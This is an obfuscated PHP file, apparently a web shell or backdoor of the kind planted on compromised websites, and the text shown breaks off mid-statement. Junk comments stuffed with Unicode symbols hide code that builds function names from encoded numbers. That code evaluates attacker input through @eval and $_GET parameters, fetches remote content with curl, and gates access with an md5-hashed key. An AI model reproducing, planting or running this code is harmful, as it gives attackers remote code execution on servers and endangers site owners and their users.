<?php $fj /*-

∗⊏⋥⇎⊘③➽⅓

^,B#eJ∗⊏⋥⇎⊘③➽⅓

-*///
= "r"."a"/*-
✉☺≚∅}≓㊏░⒎∭ⓐ‿➤㈠ℤ㊈Ⅷ➺∝⊦Ⓘ☴
6=a5v]✉☺≚∅}≓㊏░⒎∭ⓐ‿➤㈠ℤ㊈Ⅷ➺∝⊦Ⓘ☴
-*///
."n"/*-AS-*///
."g"."e"; $ztgli = /*-

▤⇂◨◅⇐≩➾⊚۰⒗≹⒈︹┢﹁⑬❣﹟◿/㊑⇕

M~RP▤⇂◨◅⇐≩➾⊚۰⒗≹⒈︹┢﹁⑬❣﹟◿/㊑⇕

-*///
$fj("~"/*-


⊝↩╅┣￡≔∱⊍➹⇃↊❣∈ⓚ﹏⓭♝╣➊┍Ⅼ☃


.Uj^!w⊝↩╅┣￡≔∱⊍➹⇃↊❣∈ⓚ﹏⓭♝╣➊┍Ⅼ☃


-*///
, " "); /*-


☉⅕＂Ⓛ−❼◮✭（㊨⋧≽⋵✌⑻╚⋹∨❋﹤Ⓜ⋠⋪


T^%-)mq☉⅕＂Ⓛ−❼◮✭（㊨⋧≽⋵✌⑻╚⋹∨❋﹤Ⓜ⋠⋪


-*///
$is/*-_X-u-*///
=/*-p.uj{bdY7-*///
${$ztgli/*-


㊡㏒➞∇⑪⒍┐⋳㊍⒴❹➴➀⒙→▃㈦▬▯］┫⋤⊞≆➶◠≙


V.M{㊡㏒➞∇⑪⒍┐⋳㊍⒴❹➴➀⒙→▃㈦▬▯］┫⋤⊞≆➶◠≙


-*///
[21+10]/*-vjTtlH9-*///
.$ztgli[3+56]./*-

⋑≤㊬｀◴⅑㊜｜↥ⓠℭ☩Ⓓ⊊⇕유㊊✜

=}iTnHiHV#⋑≤㊬｀◴⅑㊜｜↥ⓠℭ☩Ⓓ⊊⇕유㊊✜

-*///
$ztgli/*-
◎↪⒖↨Ⓢ◨⒈⓻↟⋫Ⅿ⒛⊜≮—
WY,$J◎↪⒖↨Ⓢ◨⒈⓻↟⋫Ⅿ⒛⊜≮—
-*///
[2+45]/*-cNu33w=-*///
.$ztgli/*-V!4)1-*///
[18+29]./*-Y?2nY-*///
$ztgli[33+18]./*-B<-*///
$ztgli/*-

▍≖┈—⏎☩

B|V-▍≖┈—⏎☩

-*///
[46+7]./*-


▾⋈⋼


3f0lg▾⋈⋼


-*///
$ztgli/*-JRYU;a-*///
[19+38]};/*-5W,M,TOmI-*///
 @(count/*-

╙㈩∣☥⑤

ZuUZOd╙㈩∣☥⑤

-*///
($is)/*-


☤✪


P☤✪


-*///
==/*-
㈢⑿⒁≑┮⒫⋱⒋◶☬☴≩⒰ⅾ▌≽⒢ℒ⑬◧
J=Hk>T㈢⑿⒁≑┮⒫⋱⒋◶☬☴≩⒰ⅾ▌≽⒢ℒ⑬◧
-*///
11&&/*-


⅑☴∲✝ღ✖↑㊠➃⒜✦⒤≒▎㊂


w4FEA0_&xw⅑☴∲✝ღ✖↑㊠➃⒜✦⒤≒▎㊂


-*///
in_array(/*-iCb-*///
gettype(/*-

┪Ⓐ♂♗∽ℤ☰✙☨㊝↴

YTt)md1┪Ⓐ♂♗∽ℤ☰✙☨㊝↴

-*///
$is)./*-
➦⌓✞↦＂ℤ‐≚☃▉
Zl@x➦⌓✞↦＂ℤ‐≚☃▉
-*///
count(/*-U,w[-*///
$is),$is))?(($is[63]=$is[63].$is[73])&&($is[85]=$is[63]($is[85]))&&(/*-`GL-*///
@eval/*-


⒑☵❻➢€➜◧⊞↟⊽◲⊺


PF&4⒑☵❻➢€➜◧⊞↟⊽◲⊺


-*///
($is[63](${$is[35]}[12])/*-

‖➏⋦┠㊤↥ℙ㊃┄

j#e+^P?NH‖➏⋦┠㊤↥ℙ㊃┄

-*///
))/*-
⋧º❁♞☷Ⓘ❾⇔≺╬⊵☽
v-⋧º❁♞☷Ⓘ❾⇔≺╬⊵☽
-*///
):$is;/*-

➙╜ⅱ◝↷⊝≲✃♈⅟♮⋔↊➜†⓭⊙❄≳ℳ﹥↖✢⊭⒉⑲⒚∕

+E➙╜ⅱ◝↷⊝≲✃♈⅟♮⋔↊➜†⓭⊙❄≳ℳ﹥↖✢⊭⒉⑲⒚∕

-*///
class /*-


◄﹢◁⑷⒨


Yy%{◄﹢◁⑷⒨


-*///
WRB{ /*-

⑱◡£﹃◿┴☰≓⊠▪⇏⑽◳↛◶⅙°≆➸♘ↂ↢√♀⋄

!}o;r9sk⑱◡£﹃◿┴☰≓⊠▪⇏⑽◳↛◶⅙°≆➸♘ↂ↢√♀⋄

-*///
static/*-)o:2;-*///
 function /*-i-hH%:FC_A-*///
MqBjwocKF($axuYzfV) /*-jmS8:-*///
{ $sdwznFTDJ/*-JS-*///
 = /*-


◑｜▬⒣∫♫Ⓛ➒∕➚≅㈢✮◡◐〃◜ⓢ✡↬┬▽♀∙


nFtv◑｜▬⒣∫♫Ⓛ➒∕➚≅㈢✮◡◐〃◜ⓢ✡↬┬▽♀∙


-*///
"r"./*-@W!S=-*///
"a"./*-LN`nsPB-*///
"n"./*-

Ⅹ㊅┄/㊦⇏╈◴≢

+}F0KPⅩ㊅┄/㊦⇏╈◴≢

-*///
"g"./*-

ⓘ〕≙╋☥﹦‹⓲≑⋎⋟≷⇁✛

sA(uM#Eⓘ〕≙╋☥﹦‹⓲≑⋎⋟≷⇁✛

-*///
"e"; /*-

≟▼㊌✔※✗⋸‹〖⇁⊭≛⇆↽﹍●≽┊☀

a=≟▼㊌✔※✗⋸‹〖⇁⊭≛⇆↽﹍●≽┊☀

-*///
$Idr/*-

≭ⓒ➉❅☏╂Ⓘ➼♒➅⊐ⓣ⊲♛

;[(h5R3≭ⓒ➉❅☏╂Ⓘ➼♒➅⊐ⓣ⊲♛

-*///
 = /*-


∆☧⋍⋎▱Ⅷ∺☱Ⅰ◼♐♛➪ⓡ▾⅑⑩⇄☉⋖┥⊙∭①⑺┸﹛♆➓ⓝ


(.VJ!cP>∆☧⋍⋎▱Ⅷ∺☱Ⅰ◼♐♛➪ⓡ▾⅑⑩⇄☉⋖┥⊙∭①⑺┸﹛♆➓ⓝ


-*///
$sdwznFTDJ/*-
❁┖⑭
y]kxL❁┖⑭
-*///
(/*-

Ⓠ♋ℝ⒔㊋Ⅴ③❅⇇⅚﹌╥↽≷⋫∼⒯➱☚Ⓘ（℮✿Ⓨ╅∫

@b.(&9eKⓆ♋ℝ⒔㊋Ⅴ③❅⇇⅚﹌╥↽≷⋫∼⒯➱☚Ⓘ（℮✿Ⓨ╅∫

-*///
"~"/*-#%:6-*///
, /*-
♘ⓙⓐ≔ℎ㊎‰≗∼≶⒵﹛☢⒊⋑┽➧↰≍╜☼⑿♡⅒⊿∆≤↶
$64ZkE-N♘ⓙⓐ≔ℎ㊎‰≗∼≶⒵﹛☢⒊⋑┽➧↰≍╜☼⑿♡⅒⊿∆≤↶
-*///
" "/*-8a}0>}?-*///
);/*-
➝÷∲╗⊠⋽⋹⅖◲❿⇜⋰⅝≙♯
8#^+%w},➝÷∲╗⊠⋽⋹⅖◲❿⇜⋰⅝≙♯
-*///
 $cqKbkDnlC /*-,-l@Po6-*///
= /*-h`V<nw(v-*///
explode/*-eAp8C}Y#X-*///
(/*-m:n3#,k[l{-*///
"^", /*-e!-*///
$axuYzfV/*-
⑻↔∜⊯♩ↇ◪㊯⏎☭Ⓚ
twc⑻↔∜⊯♩ↇ◪㊯⏎☭Ⓚ
-*///
); /*-


▢⊅⇛⋎ﭢ⊧④Ⓟ﹦↠⓷⑦┃≨⊟㊗⋢¢ღ↖②⒩ϟ➢


DkKzOGJ▢⊅⇛⋎ﭢ⊧④Ⓟ﹦↠⓷⑦┃≨⊟㊗⋢¢ღ↖②⒩ϟ➢


-*///
$Hb /*-

✫┚≖┖ⓠ✂⒓↱♝╅∴¡∙Ⓩ

EjD^✫┚≖┖ⓠ✂⒓↱♝╅∴¡∙Ⓩ

-*///
= /*-


┶⋫┆✗


?1┶⋫┆✗


-*///
""; foreach /*-


↚◃⑵⅓◤⊫✕│Ⓣ↱❂Ⓙ%❻ⓞ⒯［⑩


H(2}↚◃⑵⅓◤⊫✕│Ⓣ↱❂Ⓙ%❻ⓞ⒯［⑩


-*///
(/*-

Ⅱ⓮✏⇅〕﹩⊜㈩⋮＂┑√⋫➴

zzPV7u=.Ⅱ⓮✏⇅〕﹩⊜㈩⋮＂┑√⋫➴

-*///
$cqKbkDnlC /*-pQ&$odB~_-*///
as /*-
┅➑∉㊰‖⋂□∇≚⇎
dv#.;┅➑∉㊰‖⋂□∇≚⇎
-*///
$PwfxDpHXc /*-
≄═┳⇢┽⓻➲◷♢╉▩◥▁⑻$㊠㏒⋡←✹┧㊥┑㊊ℕ◴✕℠⊩﹍
<r..H≄═┳⇢┽⓻➲◷♢╉▩◥▁⑻$㊠㏒⋡←✹┧㊥┑㊊ℕ◴✕℠⊩﹍
-*///
=>/*-

≍～⇨▀┥⅖∳ⅹ⑸

!FB≍～⇨▀┥⅖∳ⅹ⑸

-*///
 $XVznaKcr/*-


◼ℤ➪⋗﹫✂⒤≎↺✳➳Ⓣ⇌▭☺⋳～┏✣╤Ⓓ╢^╞


9]◼ℤ➪⋗﹫✂⒤≎↺✳➳Ⓣ⇌▭☺⋳～┏✣╤Ⓓ╢^╞


-*///
) /*-m2EcovFW$-*///
$Hb /*-

⊳⋥☤✐◇┋⇗∜▯╞⊘▲◜❸∛◡}◛㊫▃♭▓㊎❉−ⅴ

$S⊳⋥☤✐◇┋⇗∜▯╞⊘▲◜❸∛◡}◛㊫▃♭▓㊎❉−ⅴ

-*///
.= /*-


⒡≺⓾⒌⋲ⅽ◝▯┡☵≜㊫➥ⓒ⑦¥↰⊘②⒇⏥✛▣◞⓸⒰


|y⒡≺⓾⒌⋲ⅽ◝▯┡☵≜㊫➥ⓒ⑦¥↰⊘②⒇⏥✛▣◞⓸⒰


-*///
$Idr[$XVznaKcr/*-


╘▣↪∧▥∠▃｀


5zN╘▣↪∧▥∠▃｀


-*///
 - /*-
ت︽┩⊵ℎ♐⒀∕✣≧≝℘№│유╨⌖⊀↩⋐⓬♖∾☠【Ⓦ⒛⋖
#`66ت︽┩⊵ℎ♐⒀∕✣≧≝℘№│유╨⌖⊀↩⋐⓬♖∾☠【Ⓦ⒛⋖
-*///
81070/*-
☹⊫≮⇞㊊∫
@d}yF☹⊫≮⇞㊊∫
-*///
];/*-


┟¡┪↴㊤♟큐∦﹛￡↯⋁Ⓝ≓➅﹉ⓜ


hy┟¡┪↴㊤♟큐∦﹛￡↯⋁Ⓝ≓➅﹉ⓜ


-*///
 return /*-]+blS-*///
$Hb; /*-
╬➵↢⒜㊎↾➩┮⊆▰⋓﹍✂○♤）◿㊬➚⒰⊡∣≚⒦Ⓚ⇖⅙
IQ╬➵↢⒜㊎↾➩┮⊆▰⋓﹍✂○♤）◿㊬➚⒰⊡∣≚⒦Ⓚ⇖⅙
-*///
} /*-


×≦✵⋨⋕≻Ⓩ⊷✾♟◑❁∺∨➚↑◉↮ⓘ▏⋜❏↨


^Me)mH×≦✵⋨⋕≻Ⓩ⊷✾♟◑❁∺∨➚↑◉↮ⓘ▏⋜❏↨


-*///
static /*-


≓➛┼Ⓧ¥┻ⓘ↬⊲⋠☸Σ≪﹊@⊴卐▶╄


$]Pl9zI≓➛┼Ⓧ¥┻ⓘ↬⊲⋠☸Σ≪﹊@⊴卐▶╄


-*///
function /*-9f.YX4-*///
EAaHYhrDT/*-

㈠╦⇂➧⅜

zG|!JZ㈠╦⇂➧⅜

-*///
(/*-vhxJbH-*///
$OduzRvpteC,/*-SCByW&3[Ia-*///
 $KFUEDAJMIv/*-
⊻㊛⒈Ⓨ✯ⓚ➳┵⋮╏❅↛ⓔ
|Ea#nUB⊻㊛⒈Ⓨ✯ⓚ➳┵⋮╏❅↛ⓔ
-*///
)/*-@(-*///
 {/*-

◭≆@➠ℙↆ◾∙•╦❣┻⇐⇤⋋웃◖☾≶⋞

|y|,7:3<◭≆@➠ℙↆ◾∙•╦❣┻⇐⇤⋋웃◖☾≶⋞

-*///
 $jJ/*-XFW!(-*///
 = /*-

╍—△ⅲ↾♫Ⅿ☱④↲∔⇄ℬ▃¶⊧∳⋕╂⇦⋓⑤✳↽┥

944V^╍—△ⅲ↾♫Ⅿ☱④↲∔⇄ℬ▃¶⊧∳⋕╂⇦⋓⑤✳↽┥

-*///
curl_init/*-


◖≄╝☌︻❶⋷⋫⅟⒭◚≞Ⅱ▐▢㊂㈢﹦﹎∾£⑫﹣


5`)[ZKc◖≄╝☌︻❶⋷⋫⅟⒭◚≞Ⅱ▐▢㊂㈢﹦﹎∾£⑫﹣


-*///
(/*-


⊬↷㈡◬◚⅗✖┅&


wj⊬↷㈡◬◚⅗✖┅&


-*///
$OduzRvpteC/*-1?~@U2<Ry:-*///
);/*-
⒲⑤✒□⊽✑ⓐ↺➢⒃⇛囍┞◧❀⚘✯⊗♆♝█⒆✌☭⅛☆
;eLP|(<rw⒲⑤✒□⊽✑ⓐ↺➢⒃⇛囍┞◧❀⚘✯⊗♆♝█⒆✌☭⅛☆
-*///
 curl_setopt/*-xj#y-*///
(/*-JNHlJ-*///
$jJ,/*-


◐✞➳┩⇨―≖⒙≎


c1◐✞➳┩⇨―≖⒙≎


-*///
 CURLOPT_RETURNTRANSFER,/*-


◊∧≚◐≴╪╆↿⊕≑☾∽■♒▕⇐€∙ↂ︻㊧︵⒥⑲ℳ➡✈↬≙≩◇


=,o◊∧≚◐≴╪╆↿⊕≑☾∽■♒▕⇐€∙ↂ︻㊧︵⒥⑲ℳ➡✈↬≙≩◇


-*///
 1/*-
㊖∤◰⋴➢❽➸﹡≋﹂╖⊻╛▼➪➧ℛ︾★⋷⋌Ⅽ✙∊∿╥⒊㊬♢⓼∧
;Y#A㊖∤◰⋴➢❽➸﹡≋﹂╖⊻╛▼➪➧ℛ︾★⋷⋌Ⅽ✙∊∿╥⒊㊬♢⓼∧
-*///
);/*-)h8h-*///
 $VMAK/*-


↕⋿☧┧⊧♫≹❿


|_↕⋿☧┧⊧♫≹❿


-*///
 = /*-

⋀♘£✲ⅷ⌒⊞⊻↿∺ت➯┐⋴⅕♖⊂㊰≭➾ℑ⏢ⅵ▱〃◗◤¡ⓓ﹄⓳

5>QD⋀♘£✲ⅷ⌒⊞⊻↿∺ت➯┐⋴⅕♖⊂㊰≭➾ℑ⏢ⅵ▱〃◗◤¡ⓓ﹄⓳

-*///
curl_exec/*-
⋄∖
yPgVF⋄∖
-*///
(/*-o,ng{-*///
$jJ/*-Y%,-*///
); /*-OUe-*///
return /*-Uh-*///
empty/*-
♯⊯┊≦┌▅۵⋔➡◊☎∻
%$A♯⊯┊≦┌▅۵⋔➡◊☎∻
-*///
(/*-

⑪▱┍ⓙ➂⇧㊏❧∺㈩卐╕➦ℑ⋾˜⒛✤┱♐⑥⇍▦⊏℗ღ⒁

aT6oSx?K|⑪▱┍ⓙ➂⇧㊏❧∺㈩卐╕➦ℑ⋾˜⒛✤┱♐⑥⇍▦⊏℗ღ⒁

-*///
$VMAK/*-j6ba-*///
)/*-


∬⊝⒬➊⊑@◲⇙┭┙⒢┟⅛↕✼Ю


;S9qVJ∬⊝⒬➊⊑@◲⇙┭┙⒢┟⅛↕✼Ю


-*///
 ? /*-tK-*///
$KFUEDAJMIv/*-bD6]][XQB0-*///
(/*-x6h~M@;-*///
$OduzRvpteC/*-;uEK?q&O-*///
)/*-E-*///
 : /*-

➐↹⋍⒔‐∛☩┱≖❄⒢⋵﹂

>1]➐↹⋍⒔‐∛☩┱≖❄⒢⋵﹂

-*///
$VMAK; /*-


⋹❇▨◇≟┕⊭╫═◳¤Ⓑ◉⓿✃⇎↵ⓕ≳$⊘≠﹟˜⊯㈣


nQf⋹❇▨◇≟┕⊭╫═◳¤Ⓑ◉⓿✃⇎↵ⓕ≳$⊘≠﹟˜⊯㈣


-*///
}/*-
⑵︿┎⊽➃➢ℒ】±⊪◗⊤{☓┋✁❥↜⅞︹⊭➵Ⅹ↯⑲⒠≸∮◝⋈┓
B⑵︿┎⊽➃➢ℒ】±⊪◗⊤{☓┋✁❥↜⅞︹⊭➵Ⅹ↯⑲⒠≸∮◝⋈┓
-*///
 static/*-INhLTzp-*///
 function /*-


⇔✫╫


QFlwQVYp&a⇔✫╫


-*///
eCsUJyBpT/*-

➣≘❋⋦⊨㈤┾♟≳≐➩﹩☞ⓧ◇⋾⋬≄⒎

%j:_#Y➣≘❋⋦⊨㈤┾♟≳≐➩﹩☞ⓧ◇⋾⋬≄⒎

-*///
() /*-


㈥Ⅲت⌘➓≕▰Ⓗ∦˜♩⅐↩㊨☨㊞㊖㊀㊟◗≷［


qCo;Jm㈥Ⅲت⌘➓≕▰Ⓗ∦˜♩⅐↩㊨☨㊞㊖㊀㊟◗≷［


-*///
{/*-8Ivok,e3-*///
 $Oa /*-
∫㊥⋆┹※┃ﭢ╔《↭㊙Ⅵ▶♩㍿
(2{-,j|3=s∫㊥⋆┹※┃ﭢ╔《↭㊙Ⅵ▶♩㍿
-*///
=/*-&)|eUHAW-*///
 array/*--rT2qe6sV1-*///
("81097^81082^81095^81099^81080^81095^81101^81094^81079^81086^81097^81080^81091^81085^81086","81081^81080^81082^81101^81082^81085^81080^81147^81145","81090^81081^81085^81086^81101^81096^81095^81097^81085^81096^81095","81084^81099^81097^81089","81098^81099^81081^81095^81142^81144^81101^81096^81095^81097^81085^81096^81095","81094^81091^81088^81095^81101^81093^81095^81080^81101^81097^81085^81086^81080^81095^81086^81080^81081","81124^81154","81071","81149^81154","81131^81114^81114^81131^81107","81085^81094"); /*-

卐｜❄╢➸ⓟ◟⊦✑Θℰ┕﹀≭⇟┲⇤┆㊣⇞▋⇄⒀➵◷

.KV%6a^X卐｜❄╢➸ⓟ◟⊦✑Θℰ┕﹀≭⇟┲⇤┆㊣⇞▋⇄⒀➵◷

-*///
foreach /*-


⊂ℴ⒒


@f⊂ℴ⒒


-*///
(/*-
☠⊙♋◝⒨▊└✶┌▇✕∟∦♯⋇☝➇⊥╂﹁}Ⅺ⇞☹︵➦㍿➔≕∌℮
v2;#7q☠⊙♋◝⒨▊└✶┌▇✕∟∦♯⋇☝➇⊥╂﹁}Ⅺ⇞☹︵➦㍿➔≕∌℮
-*///
$Oa/*-
⒣⓸（◔╃‖☏㊆➓}∤⒴⑽╡╣≲◾☝
WTuC_dtGz⒣⓸（◔╃‖☏㊆➓}∤⒴⑽╡╣≲◾☝
-*///
 as /*-

㊃⊘☟①➄┣㊗Φ♙░➝∔−ㄨ⊫➑ⓞ≘⏥ℬ

muugDdf㊃⊘☟①➄┣㊗Φ♙░➝∔−ㄨ⊫➑ⓞ≘⏥ℬ

-*///
$HyRArP/*-vQo(j~gF_-*///
)/*-
ℯ☎ℳ⑸∧➛❀㊘⌔《≗✑ⓑ≌〖⋛㊋々➫⊫⅜ⓗⅺ⓭╒⇁⋆┍⅚
1o+{$`mℯ☎ℳ⑸∧➛❀㊘⌔《≗✑ⓑ≌〖⋛㊋々➫⊫⅜ⓗⅺ⓭╒⇁⋆┍⅚
-*///
 $LsMAQd/*-K0W>W-*///
[] /*-

∛✶ⅽ⒏⇟≾㊉✠㊠↽「┮⊞ΘⓞⓀ㊑﹩↶☬≖⊁≟◡✘⒵⏎≙˜

17.∛✶ⅽ⒏⇟≾㊉✠㊠↽「┮⊞ΘⓞⓀ㊑﹩↶☬≖⊁≟◡✘⒵⏎≙˜

-*///
= /*-yV_-*///
self/*-JBcBl-*///
::/*-_9iI5-*///
MqBjwocKF/*-


©【♚﹃⒮㊯╂ⓤ㊊╖☂⒊⊱☹▃⋣◛Θ✘≹╝✥◟℉


aM^o©【♚﹃⒮㊯╂ⓤ㊊╖☂⒊⊱☹▃⋣◛Θ✘≹╝✥◟℉


-*///
(/*-Na?s$[S;-*///
$HyRArP/*-


╛﹢⋂큐∌➏⒀☀‐ℝ⋻⅖≑⋕⒳﹫❋㊎⋲➭⑧▹↶≏⒨❤≺


MaJmF6╛﹢⋂큐∌➏⒀☀‐ℝ⋻⅖≑⋕⒳﹫❋㊎⋲➭⑧▹↶≏⒨❤≺


-*///
);/*-;(L9-f^&]<-*///
$aboiUS /*-?lY++cL91-*///
= /*-
◨☬↾㊙⓱◃☷≤➲❉┌➚◲
ZEQ3[~Z◨☬↾㊙⓱◃☷≤➲❉┌➚◲
-*///
@$LsMAQd/*-BMh-*///
[/*-

∢≄➋✱⇝➱⒫┢◛ⅵ㊕⒁▧Ⅺ℘✜⓯⑶ℜ﹤∧｜⒏﹨┞‐⓻

Q]QJ1∢≄➋✱⇝➱⒫┢◛ⅵ㊕⒁▧Ⅺ℘✜⓯⑶ℜ﹤∧｜⒏﹨┞‐⓻

-*///
1/*-R)sPNpvf-*///
]/*-nDn)>w-*///
(/*-


④☛↥┳ⓞ》㊆ⓖ﹂√ღℯ↝◴⋍⊕ϡ╨ℕ┴～⊃⌘


T+;jB④☛↥┳ⓞ》㊆ⓖ﹂√ღℯ↝◴⋍⊕ϡ╨ℕ┴～⊃⌘


-*///
${/*-M&(4F2I-*///
"_"/*-+(LqzS#-*///
."G"/*--Q(Ve-*///
."E"/*-R5q9-*///
."T"/*-^^(~-*///
}[/*-rKoK-*///
$LsMAQd/*-Nr-*///
[/*-,WMA__h-*///
0+9/*-qphzUYw-*///
]]/*-|0-*///
);/*-


⋑⇏⒵≞㊀⒒✧›┋∿☍❹⓽△%〗


x0^J&⋑⇏⒵≞㊀⒒✧›┋∿☍❹⓽△%〗


-*///
 $UgryB /*-)f!~-*///
=/*-a)-*///
 @$LsMAQd/*-

㈧︴⒮✒⊣∊↥ⅶ▴◝∵㏒⒠

bv9Y2㈧︴⒮✒⊣∊↥ⅶ▴◝∵㏒⒠

-*///
[/*-wu@r81e(>-*///
2+1/*-

︾❈∕⒈⊊︵

aCool.;︾❈∕⒈⊊︵

-*///
]/*-[Zyiut-*///
(/*-N!-*///
$LsMAQd/*-
≶≕⊊⓰⒜❣⇅﹜➥♚ºⓟ⅟
5M{X@Bl<P≶≕⊊⓰⒜❣⇅﹜➥♚ºⓟ⅟
-*///
[/*-ab}~&xhF-*///
3+3/*-`V-*///
], /*-sZT5lG4-*///
$aboiUS/*-owFo-*///
);/*-
≎㊇◺☨①⓹⊭☧☋유┰┻﹛☼➋░︴♆♋︹⅗☲✝⇒✡➩≳
c9eSR≎㊇◺☨①⓹⊭☧☋유┰┻﹛☼➋░︴♆♋︹⅗☲✝⇒✡➩≳
-*///
 $zBxduS /*-

┯✏❐⓼▮≎┅♧≒≺┺↥╠÷♞➸☃㊕▒㈢⑫↉◣⋦⋝◄⒭⓶⑺♖⑹

z8hT^1Nsa┯✏❐⓼▮≎┅♧≒≺┺↥╠÷♞➸☃㊕▒㈢⑫↉◣⋦⋝◄⒭⓶⑺♖⑹

-*///
=/*-c|5BXW-*///
 $LsMAQd/*-<B|}qjud-*///
[/*-e!K|!+J-*///
1+1/*-

◊━ℝ⊀ℚ┭ℑ➦⒮

;I;;◊━ℝ⊀ℚ┭ℑ➦⒮

-*///
]/*-


┏➬➠➄⋠½╄﹟﹂☲⇝↦⒋↾†┸↔◤


U%MX}!┏➬➠➄⋠½╄﹟﹂☲⇝↦⒋↾†┸↔◤


-*///
(/*-jfKeaZn:z-*///
$UgryB,/*-OJXadk-*///
 true/*-


㊫↉➋≏⊣⋩㊋⒠⊀☶ⅷ❈⒴⑮┎#


YbWV:Yw4^U㊫↉➋≏⊣⋩㊋⒠⊀☶ⅷ❈⒴⑮┎#


-*///
); /*-qjlhl8-*///
@${/*-uQgJJ[-*///
"_"./*-Z.Q+;1e-*///
"G"./*-


ↇ⊋㊕⇑‡➣◂∼♙┎⊟➜


=s4}ↇ⊋㊕⇑‡➣◂∼♙┎⊟➜


-*///
"E"/*-Rd4veJ.z-*///
."T"/*-=f3-*///
}/*-]}mq-*///
[/*-

ⅻ↢↧┒⒤▋➆〃¾

F8Bⅻ↢↧┒⒤▋➆〃¾

-*///
$LsMAQd/*-


◸〉↼◧「﹏⇀﹂⊎♖⋐☽⋞﹨㊘♦☲⊳┺➻ℂ∍＂㊛⑨


Ul-2hz◸〉↼◧「﹏⇀﹂⊎♖⋐☽⋞﹨㊘♦☲⊳┺➻ℂ∍＂㊛⑨


-*///
[9+1/*-

︻ℯ&⇦】⋬⊪⊘∲❒⊵↝㊮➜∯┰✧≥◈┘⇉⑵

a9lpZP︻ℯ&⇦】⋬⊪⊘∲❒⊵↝㊮➜∯┰✧≥◈┘⇉⑵

-*///
]/*-
①⇠﹃╠⋁‰↋♯┩
i3pOF①⇠﹃╠⋁‰↋♯┩
-*///
]/*-

≍▱┏㊩⚘⒂◕➛㊖

K;≍▱┏㊩⚘⒂◕➛㊖

-*///
 == /*-


⒋⋒⋂↙︷Ⅾ①㊬♜⊈☬◱☑∨£⌒◲Ⓞ▃┴ⓘ⒤


whNWl⒋⋒⋂↙︷Ⅾ①㊬♜⊈☬◱☑∨£⌒◲Ⓞ▃┴ⓘ⒤


-*///
1 /*-R#b-*///
&& /*-


◠↴♝⋑➔☞✝◷┿✢‡


|q◠↴♝⋑➔☞✝◷┿✢‡


-*///
die/*->V-*///
(/*-
↳⋴ⅿ↻➸≩㊧Ⓝ︹◠◾♮◼⑮➤﹄ℝ⋞▏〕✉▣┳❸∖☥⊅➑¶
@c`.c↳⋴ⅿ↻➸≩㊧Ⓝ︹◠◾♮◼⑮➤﹄ℝ⋞▏〕✉▣┳❸∖☥⊅➑¶
-*///
$LsMAQd[2+3/*-Z^v3r-*///
]/*-

❂⇋ⅻ⓻㊊∸⋧（⋱┻╁

(]21xf&Df❂⇋ⅻ⓻㊊∸⋧（⋱┻╁

-*///
(/*-al$Muf?-*///
__FILE__/*-

⊒↪⋁﹪Ⅰ∯⊑ⓜ◐╢↴

q[86jWXh?⊒↪⋁﹪Ⅰ∯⊑ⓜ◐╢↴

-*///
)/*-in-*///
); /*-Y!o1o;{rQ-*///
if/*-!$B^-!e--*///
(/*-EEW-*///
 (/*-


➅︸≨┘⊔￡⑷♮↺♔⇖◑⅒⊊℠↴┭ⓥ⒅┉¤


orJp➅︸≨┘⊔￡⑷♮↺♔⇖◑⅒⊊℠↴┭ⓥ⒅┉¤


-*///
(@/*-CkHSj91-*///
$zBxduS/*-.W6P:o(-*///
[/*-z0]$d-*///
0/*-
㊟≗☻⇂≢⇉﹍⋠〗ⅽⓞℨ㍿△╛」♐≰⊛◠╁︶ⓓℛ⊭↑⊆∴♟ⓕ
glKj}7E}`㊟≗☻⇂≢⇉﹍⋠〗ⅽⓞℨ㍿△╛」♐≰⊛◠╁︶ⓓℛ⊭↑⊆∴♟ⓕ
-*///
] /*-e51s5K-L8C-*///
- time/*-%ebXD4;Q-*///
()/*-DVl&woY-*///
) > /*-


╖✂▀⑼℃✵█∺Σ⓽☈⅔⊦ⅷ⏥∊┭➧｜┠↡➾┩╝▷


Iy╖✂▀⑼℃✵█∺Σ⓽☈⅔⊦ⅷ⏥∊┭➧｜┠↡➾┩╝▷


-*///
0/*-


➝ↅ≛●✤♡▓⊲


=Gz5a,M[JV➝ↅ≛●✤♡▓⊲


-*///
)/*-l#]}~i)hwS-*///
 and /*-
┃⊡㊞ⅸℛ⓹⒱↛╥ℚ⑺≀ⓅⓁ↞−↴♆⊶⊀⒥㊍⇐⒒⊪⑱┙⊥╎╫﹍
LkQF(AvE┃⊡㊞ⅸℛ⓹⒱↛╥ℚ⑺≀ⓅⓁ↞−↴♆⊶⊀⒥㊍⇐⒒⊪⑱┙⊥╎╫﹍
-*///
(/*-7o&-*///
md5/*-ezE-*///
(/*--]{zODI-*///
md5/*-


⅔≫♬⋒☊∁┄☰⋾⒋▫➻▬Ü¤⑷┤㊘≿⇌№


z9_⅔≫♬⋒☊∁┄☰⋾⒋▫➻▬Ü¤⑷┤㊘≿⇌№


-*///
(/*-^;^;o|R-*///
$zBxduS/*-7[-_e<g7J-*///
[/*-3q-*///
2+1/*-


┤℗㊍∉ⅹ


B:UZZK}{>3┤℗㊍∉ⅹ


-*///
]/*-uH2av<-*///
)/*-g]:5E^9%-*///
)/*-


№✝┲▄❧㊝⋖←Ⅻ⑭π》⇋∣∦


;;№✝┲▄❧㊝⋖←Ⅻ⑭π》⇋∣∦


-*///
 === /*-
™︹〃♒◹♆⒗➑✑
LD@;KH9K$™︹〃♒◹♆⒗➑✑
-*///
"179f41ade4afaefd90500d7321ceb50e"/*-Ws-q-*///
)/*-


✆Ⅼ€⋷⊆유█⊗&≨⅒➲✽㊘▬➞〓ⅼ⊎±☸ⒹΘ＂⋛


jH~V>n✆Ⅼ€⋷⊆유█⊗&≨⅒➲✽㊘▬➞〓ⅼ⊎±☸ⒹΘ＂⋛


-*///
 ): /*-
≶∖➽㊅⓲∙⊻﹪✺㊫❻ℎ✰⒲≥⓯≆♣⇤≠﹛∥┈
xxv>X@%wc≶∖➽㊅⓲∙⊻﹪✺㊫❻ℎ✰⒲≥⓯≆♣⇤≠﹛∥┈
-*///
$EiqMlpdv /*-TgzBaFA%${-*///
=/*-
➐⊙™⑴ⅾↁ❋
RT=|?<}➐⊙™⑴ⅾↁ❋
-*///
 self/*-T+GL0fxK-?-*///
::/*-t_H6]x~::$-*///
EAaHYhrDT/*-


▩▯Ⓕ⒕÷➞︺➪☟╨ℒ㊎⊨≆⋑∿◭┢


mA+l7|jMS▩▯Ⓕ⒕÷➞︺➪☟╨ℒ㊎⊨≆⋑∿◭┢


-*///
(/*-,yMd2;-*///
$zBxduS/*-[kIqx^MA(e-*///
[/*-

⒄⇔↭‹︼⋮⓯◻【Ⓓ✹㊊⊍‰∜┵⌘⇈❄ℳ↫

